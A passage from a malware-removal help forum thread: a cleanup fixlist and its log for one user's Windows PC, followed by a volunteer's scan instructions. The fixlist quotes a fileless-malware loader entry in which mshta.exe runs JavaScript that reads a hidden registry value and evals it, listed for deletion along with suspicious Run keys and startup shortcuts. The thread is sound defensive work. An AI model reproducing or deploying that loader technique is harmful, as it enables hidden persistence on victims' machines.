SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]
U3 idsvc; no ImagePath
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION
DeleteKey: HKCU\\software\\sdca
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat
C:\Windows\SysWOW64\000*.tmp
C:\Program Files\Internet Explorer\000*.tmp
C:\Program Files (x86)\Internet Explorer\000*.tmp
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QuickTime Task => value not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\Wow6432Node\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\Wow6432Node\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\Wow6432Node\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\Wow6432Node\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\Wow6432Node\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE}" => key removed successfully
"HKCR\PROTOCOLS\Handler\WSISVCUchrome" => key removed successfully
C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js => moved successfully
C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js => not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\MozillaPlugins\@hulu.com/Hulu Desktop" => key removed successfully
C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll => not found.
idsvc => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{182548B4-34C3-493B-9E25-80E7BECB6AEE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{182548B4-34C3-493B-9E25-80E7BECB6AEE}" => key removed successfully
C:\WINDOWS\System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{80D68447-CC1E-4AC0-8C98-D29AFA292270}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{24CF2868-3518-4830-ADEB-81A5230BD173}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{24CF2868-3518-4830-ADEB-81A5230BD173}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2917EE86-583E-4CED-848E-79DC2A6287E0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2917EE86-583E-4CED-848E-79DC2A6287E0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{426D89B7-22E3-4132-B434-C26049460A35}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{426D89B7-22E3-4132-B434-C26049460A35}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{503702D7-8726-42F3-A652-BB92440B76A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{503702D7-8726-42F3-A652-BB92440B76A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{74960916-8CB4-4A24-9C21-266DBF7C1613}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74960916-8CB4-4A24-9C21-266DBF7C1613}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{825A3C24-77CF-4714-9606-2BE4B48D1F62}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{825A3C24-77CF-4714-9606-2BE4B48D1F62}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C36A6DB5-4989-40D8-885A-EB418B1C97FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C36A6DB5-4989-40D8-885A-EB418B1C97FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6543766-4A8C-472F-8B19-CAFBF8CB18B7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6543766-4A8C-472F-8B19-CAFBF8CB18B7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD289DED-2CCC-46B1-B7A6-D863153BD078}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD289DED-2CCC-46B1-B7A6-D863153BD078}" => key removed successfully
C:\WINDOWS\System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{126C6E32-44AE-45CB-BF8C-B9605C8636F6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFC27006-0508-4E5A-B01F-AE139D853F8C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFC27006-0508-4E5A-B01F-AE139D853F8C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D82A5397-CB31-4135-8EE6-A6301B2406D1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D82A5397-CB31-4135-8EE6-A6301B2406D1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F2ADC65E-7099-42E2-B116-6BE9B5C5EED2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F2ADC65E-7099-42E2-B116-6BE9B5C5EED2}" => key removed successfully
C:\WINDOWS\System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`26hfm" ADS removed successfully.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\driversupport.com" => key removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\driversupport.com => key not found.
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**lbpxghqil<*> => value removed successfully
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee" => key removed successfully
HKCU\\software\\sdca => key removed successfully
C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk => moved successfully
C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk => moved successfully
C:\Users\Harold\AppData\Local\0d9f76\909634.lnk => moved successfully
C:\Users\Harold\AppData\Local\0d9f76 => moved successfully
C:\Users\Harold\AppData\Roaming\dc130f => moved successfully
C:\Users\Harold\jagex_runescape_preferences.dat => moved successfully
C:\Users\Harold\jagex_runescape_preferences2.dat => moved successfully

=========== "C:\Windows\SysWOW64\000*.tmp" ==========

not found

========= End -> "C:\Windows\SysWOW64\000*.tmp" ========


=========== "C:\Program Files\Internet Explorer\000*.tmp" ==========

not found

========= End -> "C:\Program Files\Internet Explorer\000*.tmp" ========


=========== "C:\Program Files (x86)\Internet Explorer\000*.tmp" ==========

not found

========= End -> "C:\Program Files (x86)\Internet Explorer\000*.tmp" ========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= netsh advfirewall reset =========

Ok.


========= End of CMD: =========


========= netsh advfirewall set allprofiles state on =========

Ok.


========= End of CMD: =========


========= Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========

ERROR: The system was unable to find the specified registry key or value.


========= End of Reg: =========


========= Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========

The operation completed successfully.



========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 1368425 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 237055010 B
Java, Flash, Steam htmlcache => 163871 B
Windows/system/drivers => 1175424 B
Edge => 2485975 B
Chrome => 0 B
Firefox => 461679635 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 22822 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 110804 B
NetworkService => 1796 B
Harold => 34893846 B
Sue => 349198 B
DefaultAppPool => 22822 B

RecycleBin => 176317497189 B
EmptyTemp: => 164.9 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:17:29 ====



#8 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 31 October 2016 - 11:23 PM

If you are replying by using the editor box below the thread' last post, click on the More Reply Options button.  This will load the full editor which has the Attach Files function at the bottom of the editor window.  Click on Browse... and select the file you want to attach to your post by using the File Explorer window that opens.  Once the file is selected and you see the file name next to the Browse... button, click Attach This File to attach the file to the post.


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#9 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 01 November 2016 - 06:04 AM

Got it! Mbar log files attached!

 

Thank you again!

 

Also, I will be traveling for the next 2 days, so I will be unable to respond to any other items that need attention until Thursday.

Attached Files



#10 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 01 November 2016 - 10:34 AM

Have a safe trip and don't worry; things look very good so far (on your system, that is).  When you get back, please run the following two checkup scans and post (or attach) those logs:
 
FIRST>>>>

AdwCleaner by Xplode

Download AdwCleaner from here or from here. Save the file to the desktop.


NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.

  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

    AdwCleaner_v5016_zpsf8ln0fea.png
  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • Click the Clean button.
  • Everything checked will be deleted.
  • When the program has finished cleaning a report appears.
  • Once done it will ask to reboot, allow this

    adwcleaner_delete_restart.jpg
  • On reboot a log will be produced please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[S0].txt
     
     

Optional:

NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.




SECOND>>>>

Malwarebytes' Anti-Malware
Please download the latest version of Malwarebytes' Anti-Malware from here .

Double Click on the mbam-setup.exe file to install the application.

Do not check on the Trial of Professional version. Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.

If an update is found, it will download and install the latest version.

When the main screen opens, if the database is out of date, you can click on the Fix Now banner or the Update Now link
Main%20Screen_zpsnnwza0ky.png

Once updated, please select Settings > Detection and Protection. Please ensure that "Scan for Rootkits" is selected along with Non-Malware Protection PUP and PUM are set to "Treat detections as malware"
Detection%20Settings_zpsaviydqil.png

Once the settings have been configured, select the Dashboard tab to return to the Main screen and select "Scan Now >>" to start the scan.
Main%20Screen_zpsnnwza0ky.png

The scan may take some time to finish, so please be patient.
mbam21-scaninprogress_zps38w26yvt.jpg

If any malware is found, you will be presented with a screen like the one below.
mbam21-removeselected_zpsg83p7wis.jpg

Please make sure that everything is checked, and click Remove Selected.
When the scan is complete, click View detailed log >> to view the results.
386d1e7f-0e85-4425-b4dc-fa8ad24a4855_zps

The report screen will open.
a50e2fb7-0c07-4ff6-917c-19e7329dab8a_zps

At the bottom click on Export and select as txt file, save the file to your desktop and click OK.  When the export is complete, select OPEN.
ExportSaved_zpsac3a71eb.png

The log file will be opened in your default text file viewer (usually Notepad); select the whole text (Ctrl + A) and copy (Ctrl + c) it to paste here in a reply.


Edited by dbrisendine, 01 November 2016 - 10:35 AM.

unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#11 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
